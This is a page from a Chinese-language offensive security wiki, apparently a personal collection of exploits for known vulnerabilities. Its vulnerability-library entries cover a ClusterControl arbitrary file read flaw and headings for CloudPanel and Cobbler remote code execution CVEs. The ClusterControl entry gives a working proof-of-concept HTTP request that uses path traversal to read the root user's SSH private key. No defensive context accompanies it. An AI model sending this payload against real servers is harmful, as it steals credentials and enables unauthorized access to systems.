跳到主要内容

BananaYH wiki

🏡Home 📗Wiki 👨🏻‍💻Github

Home
随记
速查表
免杀
漏洞库
- AC
- ALLin
web
漏洞复现
CVE
Window提权
Window权限维持
Linux提权
Linux权限维持
内网渗透
域渗透
Tool
other

ClusterControl存在任意文件读取漏洞

poc

GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host: 
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4

CloudPanelRCE漏洞CVE-2023-35885

Cobbler存在远程命令执行漏洞(CVE-2021-40323)

poc

Copyright © 2024 bananaYH, Inc.